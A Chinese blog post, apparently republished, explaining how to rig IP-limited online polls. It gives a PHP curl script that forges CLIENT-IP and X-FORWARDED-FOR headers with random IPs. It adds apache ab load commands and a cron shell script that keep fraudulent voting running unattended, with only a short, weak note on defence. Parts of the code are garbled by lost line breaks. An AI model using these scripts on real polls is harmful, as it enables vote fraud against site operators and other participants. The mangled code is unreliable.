关于投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了
一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了.顺便分析了这个网站,发现这个网站的投票系统有ip限制,但是投票是一个ajax请求.那么办法就出来了.
很多投票PC网站都是依靠限制ip,来限制投票人数.那么我用curl伪造IP,那么就可以轻易制造多个IP进行投票.
下面贴上PHP代码:
由于对方是GET AJAX请求,我这里就贴上GET方法,POST方法请自行修改
<?php
/*** @author 邹颢 zouhao619@gmail.com*/
$ip_long = array(array('607649792', '608174079'), //36.56.0.0-36.63.255.255array('1038614528', '1039007743'), //61.232.0.0-61.237.255.255array('1783627776', '1784676351'), //106.80.0.0-106.95.255.255array('2035023872', '2035154943'), //121.76.0.0-121.77.255.255array('2078801920', '2079064063'), //123.232.0.0-123.235.255.255array('-1950089216', '-1948778497'), //139.196.0.0-139.215.255.255array('-1425539072', '-1425014785'), //171.8.0.0-171.15.255.255array('-1236271104', '-1235419137'), //182.80.0.0-182.92.255.255array('-770113536', '-768606209'), //210.25.0.0-210.47.255.255array('-569376768', '-564133889'), //222.16.0.0-222.95.255.255
);
$rand_key = mt_rand(0, 9);
$ip= long2ip(mt_rand($ip_long[$rand_key][0], $ip_long[$rand_key][1]));//随机生成国内某个ip
$url='localhost/ip.php';//这里请填写投票的请求地址
$ch = curl_init($url);
$header = array( "CLIENT-IP:{$ip}", "X-FORWARDED-FOR:{$ip}",
);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // 获取数据返回
curl_exec($ch);
curl_close($ch);
前部分是随机生成国内的某个ip,然后用curl模拟请求.
由于网站限制是一个ip限制1个小时投30个票,因此,我这里就是随机的.
如果网站是限制1个ip投1个,那么最好把ip修改为顺序生成国内ip,这样可以不重复.
然后我在开启,apache ab,每次并发20个投票..很快票就刷上去了.
那么面对这样的恶意刷票有什么解决办法呢?
我没有什么好的办法防御.但是我这样的curl实际上就是webservice访问,这样的访问是不带session或者cookie的,当然,curl也可以模拟带上cookie,然后在带上phpsessionid从而来带上session.
但是对于一个未知网站而言,并不知道他的处理方式.因此,如果判断是否存在session会有效抵挡一批刷票.但是在提示的时候切勿提示是缺少session这样的文字.最好在给session一个有效时期,这样的安全度会提高(但是如果刷票者知道这样的原理,并不意味能防御住他)
补充一点:很多代码上说能够获取访问者真实的IP地址,这个我没有遇过到正确的能够获取用户真实ip的方法.如果有的话,欢迎留言
如果有什么好的防御方案,希望留言.
有时候如果超时可能会导致脚本中断,最好在配合一个crond来每分钟都执行一下脚本
脚本代码为:
#!/bin/sh
pid=`ps -ef |grep localhost/vote.php |grep vote.php | awk '{print $2}'`;
if [[ $pid == "" ]];thenecho "vote is start";nohup /usr/bin/ab -n 100000 -c 20 http://localhost/vote.php
elseecho "vote.php is running";
fi
这个脚本就是每分钟判断这个进程存在不,存在的话,就不管,不存在的话,就启动这个进程..
另外可以不用使用nohup来后台执行
在开启crond每分钟跑起来
crontab -e
编辑crond任务
* * * * * /www/web/default/Controller/Script/vote.sh
前5个*号就是代表每个分钟都执行这个脚本..如果不详,请查阅cron资料
在开启cron
service crond start
大工告成,安心让他自动刷吧.你可以去忙别的事了
Windows系统请自行计划任务,我这里就不帖代码了
关于投票系统刷票方式原理(突破ip限制刷票PHP版)相关推荐
- php投票ip限制的二维表,关于投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了 ...
- java 自动投票 httpclient ip_投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了 ...
- 投票扣积分php系统,关于投票系统刷票形式原理(突破ip限制刷票PHP版)
关于投票系统刷票方式原理(突破ip限制刷票PHP版) 先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网 ...
- 在投票系统方法的原则刷票(突破ip限制刷票PHP版)
让我谈一点:事实上,没有一个突破ip限制,因为实际上,,这项限制server结束,client牛逼,不能突破..只要是能够始终重复刷票罢了 一个朋友突然来了个网站,让我帮她投票..我是一个更好的人说话 ...
- 愚人节搞怪——突破IP限制刷票
愚人节到了,我也恶搞一下.最近看到某学校某网站发起了一个不公平的投票,于是我就趁此愚人节到来之际恶搞了一下. 目标投票系统不是判断Cookie,而是限制IP的,每个IP24小时内只能投一次,于是我就参 ...
- 报靶系统工作方式原理分析
室内靶昌建设靶机属于硬件设备,在目前国内的靶场中,软硬件结合的打靶设备叫自动报靶系统,自动报靶系统包含电子报靶软件和固定靶机设备.目前市面上较为常见的就是视觉报靶系统,可以有效读取到射击靶面的数据,并 ...
- 投票作弊程序制作思路(续)——突破IP限制投票
上个星期,给朋友作了一个投票作弊的小程序<投票作弊程序制作思路>,后来,本来也相安无事.但是可能是朋友玩的过火了.他给自己投了1万多票了,而其他人还只有几百票,于是网站管理员发现了这个情况 ...
- 简单的Web投票系统,通过数据库的内部验证实现防止刷票功能
需求分析 (1)制作一个投票系统,让学生给自己喜爱的老师投票.该系统由投票界面组成,系统运行,投票界面出现,标题为"欢迎给老师投票":在界面上有一个表格,显示了各位老师的编号.姓名 ...
- 投票系统 简易js刷票脚本
早就听说有什么刷票脚本,微博投票等等相关的投票都有某些人去刷票. 试一下吧,兴许自己也会刷票呢?捣鼓了几个小时,终于有所眉目. (1)投票系统 要刷票,就得先有个投票界面. 当然,可以直接去各个投票网 ...
最新文章
- AlexNet:深度卷积神经网络的ImageNet分类
- JS选中OPTION
- [导入]sqlserver2005 数据挖掘控件研究
- 浅析Hibernate映射(一)——基本映射
- 前端学习(3175):react-hello-react之解决跨域问题
- mysql unknown column mysql.user_MYSQL创建用户Unknown column 'plugin' in 'mysql.user'的解决
- UI素材|屏幕移动线框套件
- EL表达式中,param和requestScope的区别
- 小D课堂 - 零基础入门SpringBoot2.X到实战_第4节 Springboot2.0单元测试进阶实战和自定义异常处理_20、SpringBoot2.x配置全局异常实战...
- window目录路径太深,如何删除文件夹?
- java聊天室群聊及私聊实现!
- CQI原理及CQI指标优化
- 16哈理工新生赛 B 修建传送门 (双指针)
- 阿里云轻量应用服务器(香港)2020测评
- 判断一个树是否为二叉查找树
- linux xunsou_Linux 之 xunsearch
- 女程序员转测试 欢迎留言讨论
- C++ 检测程序是否在运行
- Windows 10下安装Elementary OS双系统
- linux 前端开发软件下载,linux前端开发工具下载_系统之家